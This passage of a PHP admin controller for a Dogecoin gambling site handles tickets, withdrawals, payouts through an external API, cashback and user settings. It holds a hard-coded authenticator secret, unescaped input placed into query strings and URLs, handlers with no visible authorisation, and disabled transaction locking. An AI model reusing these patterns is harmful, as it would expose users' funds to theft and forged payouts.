		$ticket_code = $this->input->post('ticket_code');
		$message = $this->input->post('message');
		$message = filter_var($message, FILTER_SANITIZE_STRING);
		$ticket_id = $this->Ticket->get_ticket_id($ticket_code);
		if($email == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter your email!'));
		} else if($ticket_id == 0) {
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid ticket code!'));
		} else if(!filter_var($email, FILTER_VALIDATE_EMAIL)) {
			echo json_encode(array('ret' => 0, 'mes' => 'Your email is not a valid email address!'));
		} else if($subject == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter the subject!'));
		} else if($message == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter the message!'));
		} else {
			$send_notification = intval($this->input->post('send_notification'));
			$user_id = $this->User->check_email_already_exists($email);
			$get_ticket_info = $this->Ticket->get_ticket_info($ticket_id);
			if($send_notification == 1 && $user_id != 0) {
				$check_notification_exists = $this->Notification->find_notification_by_ticket_code($user_id, $ticket_code);
				if($check_notification_exists == null) {
					if($get_ticket_info->mail_sent == 0) {
						$this->Notification->create_notification($user_id, 'A support ticket has been created in our system for you. To manage or update your ticket, please visit: <br/> <a href="https://dogepick.io/ticket.php?s='.$ticket_code.'">https://dogepick.io/ticket.php?s='.$ticket_code.'</a>', 'info');
						$this->Ticket->send_email_reply_ticket($ticket_id);
					} else {
						$this->Notification->create_notification($user_id, 'You have a message from the administrator. To view messages and respond, please visit: <br/> <a href="https://dogepick.io/ticket.php?s='.$ticket_code.'">https://dogepick.io/ticket.php?s='.$ticket_code.'</a>', 'info');
					}
				}
				$this->Message->insert_new_message(-1, '', $ticket_id, $message, 1);
			} else {
				if($get_ticket_info->mail_sent == 0) {
					$email_subject = '[Ticket:'.$ticket_code .'] '.$subject;
					$email_content = 'A support ticket has been created in our system for you. To manage or update your ticket, please visit: <br/> <a href="https://dogepick.io/ticket.php?s='.$ticket_code.'">https://dogepick.io/ticket.php?s='.$ticket_code.'</a>'; 
					$email_content = nl2br($email_content);
					//$ret = file_get_contents(base_url()."/brevo/index.php?act=send_mail&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$email."&to_name=".$email."&subject=".rawurlencode($email_subject)."&body=".rawurlencode($email_content));
					$ret = file_get_contents("http://".$this->sending_email_ip."/m4i1/index4.php?act=send_support_ticket&subject=".rawurlencode($email_subject)."&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$email."&to_name=".$email."&ticket_code=".$ticket_code);
					if($ret == 'Message has been sent') {
						$this->Ticket->send_email_reply_ticket($ticket_id);
					}
				} else {
					$email_subject = '[Ticket:'.$ticket_code .'] '.$subject;
					$email_content = 'You have a message from the administrator. To view messages and respond, please visit: <br/> <a href="https://dogepick.io/ticket.php?s='.$ticket_code.'">https://dogepick.io/ticket.php?s='.$ticket_code.'</a>'; 
					$email_content = nl2br($email_content);
					//$ret = file_get_contents(base_url()."/brevo/index.php?act=send_mail&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$email."&to_name=".$email."&subject=".rawurlencode($email_subject)."&body=".rawurlencode($email_content));
					$ret = file_get_contents("http://".$this->sending_email_ip."/m4i1/index4.php?act=send_support_ticket&subject=".rawurlencode($email_subject)."&from_mail=support@dogepick.io&from_name=support@dogepick.io&to_mail=".$email."&to_name=".$email."&ticket_code=".$ticket_code);
				}
				$this->Message->insert_new_message(-1, '', $ticket_id, $message);
			}
			$this->Ticket->update_ticket_time($ticket_id);
			$this->Ticket->reply_ticket($ticket_id);
			echo json_encode(array('ret' => 1, 'mes' => 'Your message has been successfully sent!'));
		}
	}
	
	public function process_close_ticket() {
		$ticket_code = $this->input->post('ticket_code');
		$ticket_id = $this->Ticket->get_ticket_id($ticket_code);
		$get_ticket_info = $this->Ticket->get_ticket_info($ticket_id);
		$this->Ticket->close_ticket($ticket_id);
		$check_notification_exists = $this->Notification->find_notification_by_ticket_code($get_ticket_info->user_id, $ticket_code);
		if($check_notification_exists != null) {
			$this->Notification->dismiss_notification($check_notification_exists->user_id, $check_notification_exists->notification_id);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Close ticket successfully!'));
	}
	
	public function process_reopen_ticket() {
		$ticket_code = $this->input->post('ticket_code');
		$ticket_id = $this->Ticket->get_ticket_id($ticket_code);
		$this->Ticket->reopen_ticket($ticket_id);
		echo json_encode(array('ret' => 1, 'mes' => 'Reopen ticket successfully!'));
	}
	
	public function process_edit_message() {
		$message_id = $this->input->post('message_id');
		$message = $this->input->post('message');
		$res = $this->Message->edit_message($message_id, $message);
		if($res) {
			echo json_encode(array('ret' => 1, 'mes' => 'Edit message successfully!'));
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Edit message failed!'));
		}
	}

	public function process_notify() {
		$user_id = intval($this->input->post_get('user_id'));
		$content = $this->input->post_get('content');
		$type = $this->input->post_get('type');
		$content = nl2br($content);
		if($user_id == 0) {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter user id!'));
		} else if($content == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Please enter the notification!'));
		}  else {
			$this->Notification->create_notification($user_id, $content, $type);
			echo json_encode(array('ret' => 1, 'mes' => 'Create notification successfully!'));
		}
	}
	
	public function process_payout() {
		$request_id = intval($this->input->post_get('request_id'));

		// Start transaction to lock row for update and prevent race condition
		//$this->db->trans_start();
		$request_info = $this->Request->get_request_info_by_id($request_id);

		if ($request_info == null || $request_id == 0) {
			//$this->db->trans_complete();
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid request ID'));
			return;
		}

		if ($request_info->status == 'Completed') {
			//$this->db->trans_complete();
			echo json_encode(array('ret' => 0, 'mes' => 'Duplicate payment'));
			return;
		}

		$address = $request_info->address;
		$amount = $request_info->amount;
		$fee = $this->withdrawal_fee;
		$wallets = $this->Wallet->get_all_deposit_wallets("'{$address}'");
		$sender = $this->User->get_user_info_by_id($request_info->user_id);

		if ($wallets != null) {
			$wallet_info = $wallets[0];
			$clone_sender = clone($sender);
			$clone_sender->pending_balance -= $amount;
			$clone_sender->total_withdrawals += $amount;
			$this->User->update_user_info($sender, $clone_sender);

			$DOGE_price = $this->DOGE_price;
			$USD_value = number_format(floatval($amount / $this->UNITS_PER_COIN * $DOGE_price), 2, '.', '');
			$txid = substr(md5('DOGE' . $request_id), 0, 16);
			$this->Request->complete_withdrawal_request($request_id, $txid, $USD_value);

			$received_amount = $amount - $fee;
			$receiver = $this->User->get_user_info_by_id($wallet_info->user_id);
			$this->User->update_user_info_by_id($receiver->user_id, 'processing_balance', $receiver->processing_balance + $received_amount);
			$insert_id = $this->Request->create_request($receiver->user_id, 'Deposit', $received_amount, $address, $txid);
			$this->Request->confirm_request($insert_id);
			
			if($sender->payment_notifications) {
				$this->Notification->create_notification($sender->user_id, 'Your transaction has been completed.', 'success');
			}

			$withdrawals_today = $this->Statistic->get_statistic_by_date('withdrawals', date("Y-m-d"));
			$this->Statistic->set_statistic_by_date('withdrawals', $withdrawals_today + $amount, date("Y-m-d"));

			//$this->db->trans_complete();
			echo json_encode(array('ret' => 1, 'mes' => 'The withdrawal request is completed'));
			return;
		}

		// External payout - complete transaction before calling external API
		if ($amount > 1 * 1e8) {
			$this->Request->process_withdrawal_request($request_id, '', 0);
		}

		$g = new GoogleAuthenticator();
		$value = number_format(($amount - $fee) / $this->UNITS_PER_COIN, $this->COIN_DECIMALS, '.', '');
		$type = 'Slow';
		try {
			$txid = @file_get_contents("http://194.233.92.165/doge_api/payout.php?add={$address}&val={$value}&type={$type}&sid=" . $this->create_random_key(5) . $g->getCode("LESXYADT58CVAFGZ") . $this->create_random_key(5));
			//$txid = @file_get_contents("http://158.220.96.161/doge_api/payout.php?add={$address}&val={$value}&type={$type}&sid=" . $this->create_random_key(5) . $g->getCode("LESXYADT52CVAFGY") . $this->create_random_key(5));
			if ($txid === FALSE) {
				throw new Exception('Could not get contents from url');
			}
		} catch (Exception $e) {
			$txid = 'Undefined_TXID';
		}

		if ($txid != '') {
			if ($txid == 'Invalid code!') {
				echo json_encode(array('ret' => 0, 'mes' => 'Invalid code!'));
			} else {
				$DOGE_price = $this->DOGE_price;
				$USD_value = number_format(floatval($amount / $this->UNITS_PER_COIN * $DOGE_price), 2, '.', '');
				$this->Request->process_withdrawal_request($request_id, $txid, $USD_value);
				$withdrawals_today = $this->Statistic->get_statistic_by_date('withdrawals', date("Y-m-d"));
				$this->Statistic->set_statistic_by_date('withdrawals', $withdrawals_today + $amount, date("Y-m-d"));
				echo json_encode(array('ret' => 1, 'mes' => 'The request is being processed!'));
			}
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Could not send payment request!' . $txid));
		}
		
		//$this->db->trans_complete();
	}
	
	//process withdrawal request
	public function process_check_processing_request() {
		$request_id = $this->input->post_get('request_id');
		
		//lock request//
		if($this->cache->get('lock_check_status_'.$request_id) != null) {
			echo json_encode(array('ret' => 0, 'mes' => 'This transaction is being locked!'));
			return;
		}
		$this->cache->save('lock_check_status_'.$request_id, 1, 60);
		//lock request//
		
		$request_info = $this->Request->get_request_info_by_id($request_id);
		if($request_info != null) {
			$txid = $request_info->proof;
			$user_id = $request_info->user_id;
			$amount = $request_info->amount;
			$transaction_info = $this->blockdaemon_get_transaction_info($txid);
			if($transaction_info != null) {
				$this->Request->complete_withdrawal_request($request_id, $txid);
				
				///////////////////
				$user_info = $this->User->get_user_info_by_id($user_id);
				$updated_info = clone($user_info);
				$updated_info->pending_balance -= $amount;
				$updated_info->total_withdrawals += $amount;
				$this->User->update_user_info($user_info, $updated_info);
				///////////////////
				
				if ($user_info->payment_notifications) {
					$amount_in_DOGE = $amount / 1e8;
					$formatted_amount = (floor($amount_in_DOGE) == $amount_in_DOGE)
						? intval($amount_in_DOGE)
						: rtrim(rtrim(number_format($amount_in_DOGE, 8, '.', ''), '0'), '.');
					$message = 'You have successfully withdrawn ' . $formatted_amount .
						' DOGE. You can check it on the <a href="https://dogechain.info/tx/' .
						$txid . '">blockchain</a>.';
					$this->Notification->create_notification($user_info->user_id, $message, 'success');
				}
				
				$latest_trustpilot_noti = $this->Notification->get_latest_trustpilot_notification($user_info->user_id);
				if($latest_trustpilot_noti == 0 || $latest_trustpilot_noti < time() - 86400 * 30) {
					$this->Notification->create_notification($user_info->user_id, 'If you are satisfied with our services, please help us by leaving a review of the website on <a href="https://www.trustpilot.com/review/dogepick.io">Trustpilot</a>. You can also leave a comment to help us improve and provide the best services to our customers.', 'success');
				}
				
				echo json_encode(array('ret' => 1, 'mes' => 'This transaction has been completed!'));
			} else {
				echo json_encode(array('ret' => 0, 'mes' => 'This transaction has not been completed!'));
			}
		}
		if($this->cache->get('lock_check_status_'.$request_id)) {
			$this->cache->delete('lock_check_status_'.$request_id);
		}
	}
	public function process_edit_txid() {
		$request_id = $this->input->post_get('request_id');
		$txid = $this->input->post_get('txid');
		$request_info = $this->Request->get_request_info_by_id($request_id);
		if($request_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => "This request does not exist!"));
		} else if($txid == '') {
			echo json_encode(array('ret' => 0, 'mes' => "Invalid txid!"));
		} /*else if($txid != $request_info->proof && $this->Request->get_all_requests_by_txid($txid) != null) {
			echo json_encode(array('ret' => 0, 'mes' => "Txid already exists!"));
		}*/ else {
			if($txid != $request_info->proof) {
				$amount = $request_info->amount;
				$amount = $amount / $this->UNITS_PER_COIN;
				$USD_value = number_format(floatval($amount * $this->DOGE_price), 2, '.', '');
				$this->Request->process_withdrawal_request($request_id, $txid, $USD_value);
				echo json_encode(array('ret' => 1, 'mes' => 'The request txid has been changed!'));
			}
		}
	}
	//process withdrawal request
	
	public function process_clean_bet_data() {
		$this->Game->clean_bet_data();
		echo json_encode(array('ret' => 1, 'mes' => 'Clean bet data successfully!'));
	}

	public function process_clean_log_data() {
		$this->Log->clean_log_data();
		echo json_encode(array('ret' => 1, 'mes' => 'Clean log data successfully!'));
	}
	
	public function process_cancel_request() {
		$request_id = $this->input->post_get('request_id');
		$request_act = $this->input->post_get('request_act');
		$request_info = $this->Request->get_request_info_by_id($request_id);
		if($request_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => "This request does not exist!"));
		} else if($request_info->type != 'Withdrawal' || $request_info->created_time > time() - 2) {
			echo json_encode(array('ret' => 0, 'mes' => "The request has been canceled or does not exist!"));
		} else {
			$this->Request->cancel_withdrawal_request($request_id);
			$user_info = $this->User->get_user_info_by_id($request_info->user_id);
			$updated_info = clone($user_info);
			$updated_info->pending_balance -= $request_info->amount;
			if($request_act != null && $request_act == 'refund') {
				$updated_info->balance += $request_info->amount;
			} else {
				$updated_info->total_withdrawals += $request_info->amount;
			}
			$this->User->update_user_info($user_info, $updated_info);
			echo json_encode(array('ret' => 1, 'amount' => $request_info->amount, 'mes' => "The request has been canceled!"));
		}
	}

	public function process_enable_commission() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_commission', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable commission successfully!'));
	}

	public function process_disable_commission() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_commission', 1);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable commission successfully!'));
	}
	
	public function process_enable_referrer_commission() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_referrer_commission', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable referrer commission successfully!'));
	}

	public function process_disable_referrer_commission() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_referrer_commission', 1);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable referrer commission successfully!'));
	}
	
	public function process_enable_payout() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_payout', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable payout successfully!'));
	}

	public function process_disable_payout() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_payout', 1);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable payout successfully!'));
	}
	
	//15092024
	public function process_enable_survey() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_survey', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable survey successfully!'));
	}

	public function process_disable_survey() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'disable_survey', 1);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable survey successfully!'));
	}
	//15092024
	
	public function process_enable_auto_payout() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'auto_payout', 1);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable auto payout successfully!'));
	}

	public function process_disable_auto_payout() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'auto_payout', 0);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable auto payout successfully!'));
	}
	
	public function process_enable_auto_payout2() {
		$this->enableSetting('allow_auto_payout');
		echo json_encode(array('ret' => 1, 'mes' => 'Enable auto payout successfully!'));
	}

	public function process_disable_auto_payout2() {
		$this->disableSetting('allow_auto_payout');
		echo json_encode(array('ret' => 1, 'mes' => 'Disable auto payout successfully!'));
	}
	
	//auto cashback 29092024
	public function process_enable_auto_cashback() {
		$this->enableSetting('allow_auto_cashback');
		echo json_encode(array('ret' => 1, 'mes' => 'Enable auto cashback successfully!'));
	}

	public function process_disable_auto_cashback() {
		$this->disableSetting('allow_auto_cashback');
		echo json_encode(array('ret' => 1, 'mes' => 'Disable auto cashback successfully!'));
	}
	//auto cashback 29092024
	
	//stamina feature
	public function process_enable_stamina() {
		$user_id = $this->input->post_get('user_id');
		$get_user_info = $this->User->get_user_info_by_id($user_id);
		if($get_user_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => 'Account does not exist!'));
			return;
		}
		$check_has_stamina = $this->Stamina->check_has_stamina($user_id);
		if(!$check_has_stamina) {
			$this->Stamina->create_new_stamina($get_user_info->user_id, $get_user_info->user_name, $get_user_info->user_level);
		} else {
			$this->Stamina->enable_stamina($user_id);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Enable stamina successfully!'));
	}

	public function process_disable_stamina() {
		$user_id = $this->input->post_get('user_id');
		$get_user_info = $this->User->get_user_info_by_id($user_id);
		if($get_user_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => 'Account does not exist!'));
			return;
		}
		$check_has_stamina = $this->Stamina->check_has_stamina($user_id);
		if($check_has_stamina) {
			$this->Stamina->disable_stamina($user_id);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Disable stamina successfully!'));
	}
	//stamina feature
	
	//handle_selected_users
	public function process_handle_selected_users() {
		$users_as_string = $this->input->post_get('users');
		$action = $this->input->post_get('action2');
		if($users_as_string == '') {
			echo json_encode(array('ret' => 0, 'mes' => 'Invalid user ID'));
		} else {
			$users_in_array = explode(',', $users_as_string);
			switch($action) {
				case 'ban':
				$this->User->handle_selected_users($users_as_string, $action);
				echo json_encode(array('ret' => 1, 'mes' => 'Ban selected users successfully!'));
				break;
				case 'disable_payout':
				$this->User->handle_selected_users($users_as_string, $action);
				echo json_encode(array('ret' => 1, 'mes' => 'Disable payout for selected users successfully!'));
				break;
				case 'disable_survey':
				$this->User->handle_selected_users($users_as_string, $action);
				echo json_encode(array('ret' => 1, 'mes' => 'Disable survey for selected users successfully!'));
				break;
				case 'enable_stamina':
				for($i = 0; $i < count($users_in_array); $i++) {
					$user_id = $users_in_array[$i];
					$get_user_info = $this->User->get_user_info_by_id($user_id);
					if($get_user_info != null) {
						$check_has_stamina = $this->Stamina->check_has_stamina($user_id);
						if(!$check_has_stamina) {
							$this->Stamina->create_new_stamina($get_user_info->user_id, $get_user_info->user_name, $get_user_info->user_level);
						} else {
							$this->Stamina->enable_stamina($user_id);
						}
						$email = $get_user_info->user_email;
						/*$spammers = file("application/controllers/spammers", FILE_IGNORE_NEW_LINES);
						if(!in_array($email, $spammers)) {
							array_push($spammers, $email);
							file_put_contents("application/controllers/spammers", implode(PHP_EOL, $spammers));
						}*/
						$blocked_email = $this->Ban->check_block_email($email);
						if(!$blocked_email) {
							$this->Ban->block_email($email, time(), time() + 14 * 86400);
						}
					}
				}
				echo json_encode(array('ret' => 1, 'mes' => 'Enable stamina for selected users successfully!'));
				break;
				//group feature
				case 'add_to_group':
				$group_id = intval($this->input->post_get('group_id'));
				if($group_id != 0) {
					for($i = 0; $i < count($users_in_array); $i++) {
						$user_id = $users_in_array[$i];
						$this->Group->add_user_to_group($user_id, $group_id);
					}
					echo json_encode(array('ret' => 1, 'mes' => 'Add to group for selected users successfully!'));
				} else {
					echo json_encode(array('ret' => 0, 'mes' => 'No group selected'));
				}
				break;
				//group feature
				
				//cashback
				case 'cashback':
				for($i = 0; $i < count($users_in_array); $i++) {
					$user_id = $users_in_array[$i];
					if($user_id != 0) {
						$user_info = $this->User->get_user_info_by_id($user_id);
						if($user_info->temp_bet_balance < 0) {
							$cashback_amount = max(0, intval(-$user_info->temp_bet_balance / 20));
							
							/*****************/
							$stamina_info = $this->Stamina->get_stamina_info_by_uid($user_id);
							if($stamina_info != null && $stamina_info->status == 1) {
								$cashback_amount = max(0, intval(-$user_info->temp_bet_balance / 50));
							}
							/*****************/
							
							/*****************/
							$USD_value = floatval($cashback_amount / 1e8 * $this->DOGE_price);
							if($USD_value > 0.2) {
								$this->Notification->create_notification($user_id, 'We’ve just credited you with '.number_format($cashback_amount / 1e8, 8, '.', '').' DOGE cashback as part of our weekly rewards program. Thank you for being with us!', 'success');
							}
							$latest_trustpilot_noti = $this->Notification->get_latest_trustpilot_notification($user_id);
							if($latest_trustpilot_noti == 0 || $latest_trustpilot_noti < time() - 86400 * 30) {
								$this->Notification->create_notification($user_id, 'If you are satisfied with our services, please help us by leaving a review of the website on <a href="https://www.trustpilot.com/review/dogepick.io">Trustpilot</a>. You can also leave a comment to help us improve and provide the best services to our customers.', 'success');
							}
							/*****************/
							
							$this->User->update_user_info_by_id($user_id, 'available_commission_balance', $user_info->available_commission_balance + $cashback_amount, 0);
							$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', 0);
							$this->Bonus->insert_entry($user_id, $cashback_amount, 'Pay cashback');
							
							if($user_info->referrer != 0) {
								$get_referrer = $this->User->get_user_info_by_id($user_info->referrer);
								if($get_referrer != null) {
									$referral_cashback_amount = $cashback_amount / 2;
									$this->User->update_user_info_by_id($get_referrer->user_id, 'available_commission_balance', $get_referrer->available_commission_balance + $referral_cashback_amount, 0);
									$this->User->update_user_info_by_id($get_referrer->user_id, 'temp_bet_balance', max(0,  $get_referrer->temp_bet_balance - $referral_cashback_amount * 20));
									$this->Bonus->insert_entry($get_referrer->user_id, $referral_cashback_amount, 'Pay referral cashback');
								}
							}
						}
					}
				}
				echo json_encode(array('ret' => 1, 'mes' => 'Reset and pay cashback successfully!'));
				break;
				//cashback
				
				default:
				echo json_encode(array('ret' => 0, 'mes' => 'No action has been selected!'));
				break;
			}
		}
	}
	//handle_selected_users
	
	
	public function process_block_sender() {
		$email = $this->input->post('email');
		$check_block_email = $this->Ban->check_block_email($email);
		if(!$check_block_email) {
			$this->Ban->block_email($email, time(), time() + 180 * 86400);
			echo json_encode(array('ret' => 1, 'mes' => 'Block sender successfully!'));
		} else {
			echo json_encode(array('ret' => 1, 'mes' => 'This sender has already blocked!'));
		}
	}
	
	public function process_unblock_sender() {
		$email = $this->input->post('email');
		$check_block_email = $this->Ban->check_block_email($email);
		if($check_block_email) {
			$this->Ban->unblock_email($email);
			echo json_encode(array('ret' => 1, 'mes' => 'Unblock sender successfully!'));
		} else {
			echo json_encode(array('ret' => 1, 'mes' => 'This sender is not a spammer!'));
		}
	}
	
	public function process_reset_temp_profit() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', 0);
			echo json_encode(array('ret' => 1, 'mes' => 'Reset temp profit successfully!'));
		} else {
			echo json_encode(array('ret' => 1, 'mes' => 'Invalid user id!'));
		}
		
	}
	
	public function process_reset_and_pay_cashback() {
		$user_id = $this->input->post_get('user_id');
		if($user_id != 0) {
			$user_info = $this->User->get_user_info_by_id($user_id);
			if($user_info->temp_bet_balance >= 0) {
				echo json_encode(array('ret' => 0, 'mes' => 'Temp bet balance has already reset!'));
			} else {
				$cashback_amount = max(0, intval(-$user_info->temp_bet_balance / 20));
				$this->User->update_user_info_by_id($user_id, 'available_commission_balance', $user_info->available_commission_balance + $cashback_amount, 0);
				$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', 0);
				$this->Bonus->insert_entry($user_id, $cashback_amount, 'Pay cashback');
				
				if($user_info->referrer != 0) {
					$get_referrer = $this->User->get_user_info_by_id($user_info->referrer);
					if($get_referrer != null) {
						$referral_cashback_amount = $cashback_amount / 2;
						$this->User->update_user_info_by_id($get_referrer->user_id, 'available_commission_balance', $get_referrer->available_commission_balance + $referral_cashback_amount, 0);
						$this->User->update_user_info_by_id($get_referrer->user_id, 'temp_bet_balance', max(0,  $get_referrer->temp_bet_balance - $referral_cashback_amount * 20));
						$this->Bonus->insert_entry($get_referrer->user_id, $referral_cashback_amount, 'Pay referral cashback');
					}
				}
				
				
				echo json_encode(array('ret' => 1, 'mes' => 'Reset and pay cashback successfully!'));
			}
		} else {
			echo json_encode(array('ret' => 1, 'mes' => 'Invalid user id!'));
		}
	}
	
	public function process_pay_contest_reward() {
		$user_id = intval($this->input->post_get('user_id'));
		$contest = $this->input->post_get('contest');
		$get_lastweek_winners = $this->Contest->get_lastweek_winners();
		if($get_lastweek_winners != null) {
			if($user_id != 0) {
				$week = $get_lastweek_winners->week;
				$get_lastweek_winners = json_decode($get_lastweek_winners->data);
				if($contest == 'wagering_contest') {
					foreach($get_lastweek_winners->wagering_contest as $wagering_contest) {
						if(intval($wagering_contest->user_id) == $user_id && !isset($wagering_contest->paid)) {
							$reward = intval($wagering_contest->reward);
							$user_info = $this->User->get_user_info_by_id($user_id);
							$this->User->update_user_info_by_id($user_id, 'available_commission_balance', $user_info->available_commission_balance + $reward, 0);
							$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', min(0,  $user_info->temp_bet_balance + $reward * 20));
							$this->Bonus->insert_entry($user_id, $reward, 'Pay wagering contest reward');
							$wagering_contest->paid = 1;
							$this->Contest->update_data_by_week($week, json_encode(array(
								'wagering_contest'	=> $get_lastweek_winners->wagering_contest,
								'referral_contest'	=> $get_lastweek_winners->referral_contest
							)));
							echo json_encode(array('ret' => 1, 'mes' => 'Pay contest reward successfully!'));
							return;
						}
					}
				} else if($contest == 'referral_contest'){
					foreach($get_lastweek_winners->referral_contest as $referral_contest) {
						if(intval($referral_contest->user_id) == $user_id && !isset($referral_contest->paid)) {
							$reward = intval($referral_contest->reward);
							$user_info = $this->User->get_user_info_by_id($user_id);
							$this->User->update_user_info_by_id($user_id, 'available_commission_balance', $user_info->available_commission_balance + $reward, 0);
							$this->User->update_user_info_by_id($user_id, 'temp_bet_balance', min(0,  $user_info->temp_bet_balance + $reward * 20));
							$this->Bonus->insert_entry($user_id, $reward, 'Pay referral contest reward');
							$referral_contest->paid = 1;
							$this->Contest->update_data_by_week($week, json_encode(array(
								'wagering_contest'	=> $get_lastweek_winners->wagering_contest,
								'referral_contest'	=> $get_lastweek_winners->referral_contest
							)));
							echo json_encode(array('ret' => 1, 'mes' => 'Pay contest reward successfully!'));
							return;
						}
					}
				}
				echo json_encode(array('ret' => 0, 'mes' => 'User does not exist or has been paid!'));
			} else {
				echo json_encode(array('ret' => 0, 'mes' => 'Invalid user id!'));
			}
		} else {
			echo json_encode(array('ret' => 0, 'mes' => 'Contests data is empty'));
		}
	}
	
	public function process_repay() {
		$request_id = $this->input->post_get('request_id');
		$request_info = $this->Request->get_request_info_by_id($request_id);
		if($request_info == null) {
			echo json_encode(array('ret' => 0, 'mes' => "This request does not exist!"));
		} else if($request_info->type != 'Withdrawal' || $request_info->status != 'Processing') {
			echo json_encode(array('ret' => 0, 'mes' => "The request has been canceled or does not exist!"));
		} else {
		
			$user_id = $request_info->user_id;
			$amount_in_koinu = $request_info->amount;
			$txid = $request_info->proof;
			$address = $request_info->address;
			
			if(strpos($txid, 'Send to') !== false) {
				echo json_encode(array('ret' => 0, 'mes' => "The request has been canceled or completed!"));
				return;
			} 
			
			//repay
			$amount_in_DOGE = $amount_in_koinu / $this->UNITS_PER_COIN;
			
			try {
				$g = new GoogleAuthenticator();
				$type = 'Slow';
				$txid = @file_get_contents("http://194.233.92.165/doge_api/payout.php?add=".$address."&val=".$amount_in_DOGE."&type=".$type."&sid=".$this->create_random_key(5).$g->getCode("LESXYADT58CVAFGZ").$this->create_random_key(5));
				//$txid = @file_get_contents("http://158.220.96.161/doge_api/payout.php?add=".$address."&val=".$amount_in_DOGE."&type=".$type."&sid=".$this->create_random_key(5).$g->getCode("LESXYADT52CVAFGY").$this->create_random_key(5));
				if ($txid === FALSE) {
					throw new Exception('Could not get contents from url');
				} else {
					$USD_value = number_format(floatval($amount_in_DOGE * $this->DOGE_price), 2, '.', '');
					$this->Request->process_withdrawal_request($request_id, $txid, $USD_value);
	
					echo json_encode(array('ret' => 1, 'mes' => 'The request has been repaid!'));
				}
			} catch(Exception $e) {
				$txid = 'Undefined_TXID';
			}
			
			//repay
		}
	}
	
	public function process_confirm_deposit_request() {
		// Lấy request chưa confirm cũ nhất
		$request_id = $this->Request->get_oldest_unconfirmed_request();

		if (!$request_id) {
			echo "- No unconfirmed requests found.<br/>";
			return;
		}

		// Lấy thông tin request
		$request = $this->Request->get_request_info_by_id($request_id);
		if (!$request) {
			echo "- Request not found.<br/>";
			return;
		}

		$txid   = $request->proof;
		$user_id = $request->user_id;
		$amount  = $request->amount;

		$user_info = $this->User->get_user_info_by_id($user_id);

		// gọi API check confirmations
		$api_url = "http://158.220.96.161/doge_api/check_confirmations.php?txid=" . urlencode($txid);
		$api_response = @file_get_contents($api_url);
		$confirm_data = json_decode($api_response, true);

		if (!$confirm_data || !isset($confirm_data['confirmations'])) {
			echo "- Could not fetch confirmation info for TX $txid <br/>";
			return;
		}

		$confirmations = intval($confirm_data['confirmations']);
		$status        = $confirm_data['status'];

		// Trường hợp double spend
		if ($status === "CONFLICTED") {
			$this->Request->cancel_deposit_request($request_id);
			$this->User->update_user_info_by_id(
				$user_id,
				'processing_balance',
				$user_info->processing_balance - $amount
			);
			echo "- The transaction $txid is conflicted. Request $request_id removed.<br/>";
			return;
		}

		// Trường hợp đã có confirm
		if ($confirmations >= 6) {
			if ($request->type == 'Deposit') {
				$this->Request->confirm_request($request_id);
				echo "- The deposit request ($request_id) is confirmed with $confirmations confirmations<br/>";
			} else {
				$this->Request->complete_withdrawal($request_id);
				echo "- The withdrawal request ($request_id) is completed<br/>";
			}
		} else {
			echo "- The transaction $txid has only $confirmations confirmations. Still pending...<br/>";
		}
	}
	
	
	public function process_change_referrer() {
		$user_id = $this->input->post_get('user_id');
		$referrer_id = $this->input->post_get('referrer_id');
		if($user_id != 0 && $referrer_id != '') {
			$this->User->update_user_info_by_id($user_id, 'referrer', $referrer_id);
		}
		echo json_encode(array('ret' => 1, 'mes' => 'Change referrer successfully!'));
	}
	
	public function process_correct_email() {
		$user_id = $this->input->post_get('user_id');
		$old_email = $this->input->post_get('old_email');
